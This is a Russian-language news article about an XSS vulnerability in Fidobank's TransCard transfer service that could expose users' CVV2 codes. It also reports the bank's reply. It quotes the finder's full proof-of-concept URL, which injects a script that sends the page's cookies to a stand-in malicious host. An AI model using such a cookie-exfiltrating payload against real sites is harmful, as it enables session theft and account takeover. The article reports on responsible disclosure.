В сервисе мгновенного перевода средств с карты на карту украинского банка “Фидобанк” обнаружилась уязвимость, с помощью которой злоумышленники могут узнать CVV2-код пользователя через интернет. Этот код очень важен – зная его, намного проще взломать счет и получить доступ к денежным средствам. Уязвимость обнаружил пользователь “Хабра” под ником dinikin, который ранее находил бреши и скрытые возможности в онлайн-сервисах “Альфа-банка”. В “Фидобанке” говорят, что уязвимость не критична, но в течение суток обещают улучшить безопасность системы.
При помощи XSS-уязвимости злоумышленник, зная номер карты человека, который недавно делал денежный перевод через сервис “Фидобанка” TransCard, может получить CVV2-код его карты. Чтобы обеспечить себе полный доступ к счету, мошеннику останется лишь подобрать срок действия карты, а это всего два параметра – месяц и год.
Уязвимость была обнаружена в процессе пересылки средств с карты на карту через p2p-сервис “Фидобанка”. “После осуществления платежа меня переадресовало на страницу вида pay.fidobank.ua/TransCard/pay?SenderTransID=TS1421332314712. Я решил проверить, фильтруется ли значение параметра SenderTransID, которое выводилось на странице. Естественно, оно не фильтровалось и давало возможность эксплуатации XSS-уязвимости. Я составил url, при переходе на который все куки отправлялись на фейковый псевдозловредный сайт someveryverydangeroussite.com. URL выглядел следующим образом:
https://pay.fidobank.ua/TransCard/pay?SenderTransID=<form method=get name=a action=https://someveryverydangeroussite.com><input name=b></form><script>document.a.b.value=document.cookie;alert(document.a.b.value);document.a.submit();</script>
Переход по этой ссылке показывал следующее сообщение:
Все бы ничего, если бы разработчики еще больше на облегчили работу по эксплуатации уязвимости, сохраняя cvv2 код в поле для его ввода даже после проведения платежа”, – пишет dinikin.
По его мнению, из-за подобной уязвимости “Фидобанк” не смог бы пройти PCI DSS-сертификацию (стандарт безопасности данных индустрии платежных карт). “Хранить CVV2 каким-либо образом на сервере строго запрещено платежными системами Visa и MasterCard”, – пояснил он. Впрочем, в комментариях пользователи “Хабра” пишут, что CVV не обязательно хранится на сервере, возможны и другие варианты, например, localStorage или в самой сессии.
Об обнаруженной уязвимости пользователь якобы сообщил в банк еще две недели назад, однако, судя по комментариям сотрудников “Фидобанка” в Facebook, ее до сих пор не устранили. “Пока можно пользоваться сервисом переводов с #FidoWallet, там все в порядке”, – написал в обсуждении эксперт в сфере мобильного банкинга Сергей Скабелин. По его словам, сейчас на устранение уязвимости в банке брошены все силы. Этот факт косвенно может подтверждаться тем, что сервис TransCard периодически работает нестабильно.
В “Фидобанке” на запрос AIN.UA ответили, что банк уже провел анализ полученной информации об уязвимости. “В результате проверки было определено, что критичные данные клиента, в частности CVV2-код, не хранятся на ресурсе, следовательно, кража информации о CVV2 невозможна, – говорится в сообщении пресс-службы. – Мы благодарим клиента, обратившего наше внимание на этот аспект работы системы. В течение 24 часов в рамках обновления будет улучшена в том числе и безопасность сервиса онлайн-переводов”.
Напомним, “Фидобанк” учредил Александр Адарич, позиционируя финучреждение как исключительно инновационную компанию, которая предлагает самые современные платежные и расчетные инструменты.
